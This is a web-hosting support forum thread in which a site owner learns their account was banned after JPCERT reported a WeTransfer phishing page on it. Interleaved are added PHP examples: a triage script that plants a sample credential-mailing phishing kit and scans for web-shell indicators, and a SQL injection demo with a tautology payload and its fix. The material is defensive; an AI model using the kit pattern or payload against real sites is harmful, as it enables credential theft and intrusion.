lemonions Posted February 19, 2019 Hi, I received an inode quota exceeded notice, and I have already restructured the folder, but it seems it is too late? Or was it suspended for another reason? Need help, please and thank you. Username: lemonion Server: Tommy Main domain: bzysharing.com
wolstech Posted February 19, 2019 It's banned for phishing. I'm not sure if your site is capable of allowing people to share such material or if it got hacked, but it was definitely serving an active phishing site at the link indicated when we received the report. An invitation for a replacement account will be sent to the associated email address shortly so you can restore your site. The abuse report that resulted in this is below:

Hello, We have received notice of phishing content on the 65.19.143.6 IP address. Please remove/disable the phishing content immediately and investigate this issue. If this is a compromised machine or account, please take care of the underlying security vulnerabilities which were exploited. If this is a user that opened an account for fraudulent purposes, please permanently ban the user in question. Once you have identified and resolved the issue, please reply to this email with full details of resolution including specific steps taken to prevent recurrence. Please also CC info@jpcert.or.jp on your reply to this email. If the phishing content is not removed promptly (within 1 hour), we may null route the 65.19.143.6 IP address.
Complaint:
From no-reply@abuse.he.net Mon Feb 18 00:45:06 2019
Return-Path: <no-reply@abuse.he.net>
X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on he.net
X-Spam-Level: ***
X-Spam-Status: No, score=3.3 required=5.0 tests=BAYES_50,MIME_BASE64_TEXT, RDNS_NONE,SPF_HELO_PASS,SPF_PASS,URIBL_BLOCKED autolearn=no version=3.3.2
Authentication-Results: he.net; spf=pass (he.net: domain of abuse.he.net designates 216.218.217.245 as permitted sender) smtp.mailfrom=no-reply@abuse.he.net
Received-SPF: pass (he.net: domain of abuse.he.net designates 216.218.217.245 as permitted sender) client-ip=216.218.217.245; envelope-from=no-reply@abuse.he.net; helo=abuse.he.net;
Received: from abuse.he.net ([216.218.217.245]) by he.net for <support@he.net>; Mon, 18 Feb 2019 00:45:06 -0800
Received: from abuse.he.net (localhost [127.0.0.1]) by abuse.he.net (Postfix) with ESMTP id 3D7FE540420 for <support@he.net>; Mon, 18 Feb 2019 00:43:49 -0800 (PST)
X-Mailbox-Line: From info@jpcert.or.jp Mon Feb 18 00:43:39 2019
X-Original-To: report@abuse.he.net
Delivered-To: report@abuse.he.net
Received: from he.net (he.net [216.218.186.2]) by abuse.he.net (Postfix) with ESMTPS id 2A98954038E for <report@abuse.he.net>; Mon, 18 Feb 2019 00:43:37 -0800 (PST)
Authentication-Results: he.net; spf=pass (he.net: domain of jpcert.or.jp designates 210.148.223.3 as permitted sender) smtp.mailfrom=info@jpcert.or.jp
Received-SPF: pass (he.net: domain of jpcert.or.jp designates 210.148.223.3 as permitted sender) client-ip=210.148.223.3; envelope-from=info@jpcert.or.jp; helo=mx01.jpcert.or.jp;
Received: from mx01.jpcert.or.jp ([210.148.223.3]) by he.net with ESMTPS (ECDHE-RSA-AES256-GCM-SHA384:TLSv1.2:Kx=ECDH:Au=RSA:Enc=AESGCM(256):Mac=AEAD) for <abuse@he.net>; Mon, 18 Feb 2019 00:44:43 -0800
Date: Mon, 18 Feb 2019 17:43:34 +0900
Subject: JPCERT#50185904 Phishing Information
To: support@he.net
CC: soc@us-cert.gov
From: JPCERT/CC <info@jpcert.or.jp>
Reply-To: JPCERT/CC <info@jpcert.or.jp>
Message-ID: <20190218084349.7249.95432@abuse.he.net>
MIME-Version: 1.0
Content-Disposition: inline
Content-Type: multipart/signed; micalg=pgp-sha256; protocol="application/pgp-signature"; boundary="6c58212c7e3fc229c6bbc51a88a798b6"
X-Virus-Status: No
X-Virus-Checker-Version: clamassassin 1.2.4 with clamdscan / ClamAV 0.99.2/25363/Sun Feb 17 03:12:54 2019

---- Original message ----
> This is JPCERT/CC from Japan.
>
> JPCERT/CC received a report of one or more fraudulent web site(s) that
> appear to be running on a system on your network or a constituent's
> network.
>
> The site spoofs WeTransfer.
>
> fraudulent web site:
> http[:]//bzysharing[.]com/app/WeTransfer.com/index.php
> (65.19.143.6)
>
> * Please make sure to connect to the URL in an environment in
> which the script will not execute.
> * We confirmed the site is displayed when we access it in
> Internet Explorer 11.
>
> If the site differs from what you intend, please take appropriate
> measures for protection from these incidents.
>
> We are sending this message to the technical contact person(s) of
>
> NetRange or inetnum: 65.19.128.0 - 65.19.191.255
>
> found in the Whois Database.
>
> JPCERT#50185904 is the incident reference number we assigned to this
> incident. We ask you to include this number in the subject line of
> future correspondence. We would greatly appreciate any assistance you
> can provide in dealing with this incident.
>
> There are references on this incident in the following URLs.
>
> US-CERT Cyber Security Tip ST04-014
> Avoiding Social Engineering and Phishing Attacks
> https://www.us-cert.gov/cas/tips/ST04-014.html
>
> JPCERT/CC is a national CSIRT and also a member of FIRST (the Forum of
> Incident Response and Security Teams, <http://www.first.org/>). Our
> primary purpose is to respond to computer security incidents for the
> Internet community in Japan.
>
> Regards,
> JPCERT/CC Incident Response Team
> ======================================================================
> JPCERT/Coordination Center
> Phone: +81-3-6271-8901 Email: info@jpcert.or.jp
> https://www.jpcert.or.jp/
lemonions Posted February 19, 2019 Author Thanks for your help, I received the link. May I know how I can prevent this from happening again? My web does not allow people to share anything / post anything. From the message you show: fraudulent web site: > http[:]//bzysharing[.]com/app/WeTransfer.com/index.php Does it mean that the hacker has uploaded the index.php to my file system?
wolstech Posted February 19, 2019 Since you didn't upload that phishing page, someone else definitely did. How it got there is anyone's guess. It could be weak passwords or a security hole in the software you were using. I'd suggest changing your passwords and keeping your software up to date (or finding different software).
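The first thing a practitioner would want after a report like the one above is a way to find out what else was planted besides the reported index.php. The following is an added example written for this page, not code from the thread or from the site owner: a small PHP CLI triage script that walks a web root, lists every file modified within the last N days, and flags PHP files containing indicators that commonly appear in dropped phishing kits and web shells. The web root path, the seven-day window, the indicator list and the sample files it builds in a temporary directory are all assumptions; on a real XAMPP install you would point it at your htdocs directory instead.

```php
<?php
// Added example, not code from the thread: triage a web root for recently planted files.
// Assumptions: the web root, the N-day window and the indicator list are hypothetical.

function findRecentFiles(string $root, int $days = 7): array
{
    $cutoff = time() - $days * 86400;
    $hits = [];
    $iter = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($iter as $entry) {
        // Only regular files whose modification time falls inside the window.
        if ($entry->isFile() && $entry->getMTime() >= $cutoff) {
            $hits[] = $entry->getPathname();
        }
    }
    sort($hits);
    return $hits;
}

function phpIndicators(string $path): array
{
    // Crude, assumption-based indicators. A legitimate site can match mail() too,
    // so each hit is a lead to read by hand, not a verdict.
    $patterns = [
        'eval'     => '/\beval\s*\(/i',
        'base64'   => '/base64_decode\s*\(/i',
        'mail'     => '/\bmail\s*\(/i',
        'dyn-call' => '/\$_(GET|POST|REQUEST)\s*\[[^\]]+\]\s*\(/',
    ];
    $src = file_get_contents($path);
    $found = [];
    foreach ($patterns as $name => $re) {
        if (preg_match($re, $src)) {
            $found[] = $name;
        }
    }
    return $found;
}

function triage(string $root, int $days = 7): array
{
    $report = [];
    foreach (findRecentFiles($root, $days) as $file) {
        $report[$file] = preg_match('/\.php$/i', $file) ? phpIndicators($file) : [];
    }
    return $report;
}

// --- Constructed sample web root (stands in for C:\xampp\htdocs) ---
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'htdocs_' . uniqid();
mkdir("$root/app/WeTransfer.com", 0700, true);

file_put_contents("$root/index.php", "<?php echo 'site';");
touch("$root/index.php", time() - 90 * 86400);   // the owner's own, 90-day-old file

// A planted kit at the path named in the abuse report, written just now.
file_put_contents(
    "$root/app/WeTransfer.com/index.php",
    "<?php if (\$_POST) { mail('drop@example.com', 'creds', \$_POST['pw']); }"
);

// Every recent file is printed; flagged indicators follow in brackets.
foreach (triage($root) as $file => $flags) {
    printf("%s%s\n", $file, $flags ? '  [' . implode(',', $flags) . ']' : '');
}
```

Run it with `php triage.php` from the XAMPP shell. The old index.php falls outside the window and is not listed; the planted file is listed and flagged because it calls mail(), which is how many phishing kits exfiltrate captured credentials. Compare the listed files against a known-good copy of your site rather than trusting the indicators alone, and remember that an attacker who changes file timestamps will not show up in an mtime sweep.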
lemonions Posted February 19, 2019 Author Okay, will take notes. Currently I am using XAMPP.
wolstech Posted February 19, 2019 XAMPP is just an AMP stack for Windows. The PHP program your site is running on would be the software that needs to be fixed/updated/replaced.
lemonions Posted February 20, 2019 Author I was not aware of this. Is the 'software' you mentioned here the script that my web uses to access MySQL that might be the problem, or a different thing? Do you have any example of the software name?
wolstech Posted February 20, 2019 By software I mean the PHP files that make up your site. Your PHP code is so basic that there doesn't seem to be anything to exploit for file uploads, though. You do have SQL injection vulnerabilities, but those are typically used to maliciously alter or steal database content, and generally wouldn't lead to someone uploading a phishing website (I would recommend some research and code updates to protect against SQL injection). A weak password is another (more likely) possibility in your particular case.
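The post above names two problems without showing the fix for either: SQL injection in the site's PHP, and weak passwords. The following is an added example written for this page, not the poster's code: the same user lookup written once with string concatenation (injectable) and once as a PDO prepared statement, plus a login check that stores and verifies a password hash instead of the password itself. It uses an in-memory SQLite database so it runs offline; on XAMPP you would change only the DSN to the MySQL one. The `users` table, its columns, the sample user and the injection payload are assumptions.

```php
<?php
// Added example, not the poster's code. Assumptions: table/column names, the sample
// user, and the payload. Swap the DSN for 'mysql:host=127.0.0.1;dbname=...' on XAMPP.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pw_hash TEXT)');

// Store a hash, never the password: a SQL injection that dumps this table
// gives the attacker bcrypt hashes, not logins.
$ins = $db->prepare('INSERT INTO users (name, pw_hash) VALUES (?, ?)');
$ins->execute(['alice', password_hash('correct horse battery staple', PASSWORD_DEFAULT)]);

// Vulnerable: attacker-controlled text becomes part of the SQL statement itself.
function findUserUnsafe(PDO $db, string $name): ?array
{
    $sql = "SELECT id, name, pw_hash FROM users WHERE name = '" . $name . "'";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

// Fixed: the statement text is constant; the value is sent separately as a parameter,
// so quotes and OR clauses inside it are just characters in a name.
function findUserSafe(PDO $db, string $name): ?array
{
    $stmt = $db->prepare('SELECT id, name, pw_hash FROM users WHERE name = ?');
    $stmt->execute([$name]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

function login(PDO $db, string $name, string $password): bool
{
    $user = findUserSafe($db, $name);
    // password_verify compares against the stored hash in constant time.
    return $user !== null && password_verify($password, $user['pw_hash']);
}

// A classic payload: it closes the quoted string and appends an always-true clause.
$payload = "nobody' OR '1'='1";

echo "unsafe lookup with payload: ";
var_dump(findUserUnsafe($db, $payload) !== null);   // the injected OR clause matches every row
echo "safe lookup with payload:   ";
var_dump(findUserSafe($db, $payload) !== null);     // the payload is searched for as a literal name
echo "login with wrong password:  ";
var_dump(login($db, 'alice', 'wrong'));
echo "login with right password:  ";
var_dump(login($db, 'alice', 'correct horse battery staple'));
```

The same rule covers every query that touches user input, not just login: any value that arrives from `$_GET`, `$_POST`, cookies or headers goes through a placeholder, never through string concatenation, and `mysqli` offers the same `prepare()`/`bind_param()` pattern if the site does not use PDO. Hashing with `password_hash()` does not make a weak password strong, but it limits what a database dump is worth; a long, unique password on the hosting account itself addresses the "more likely" cause the post names.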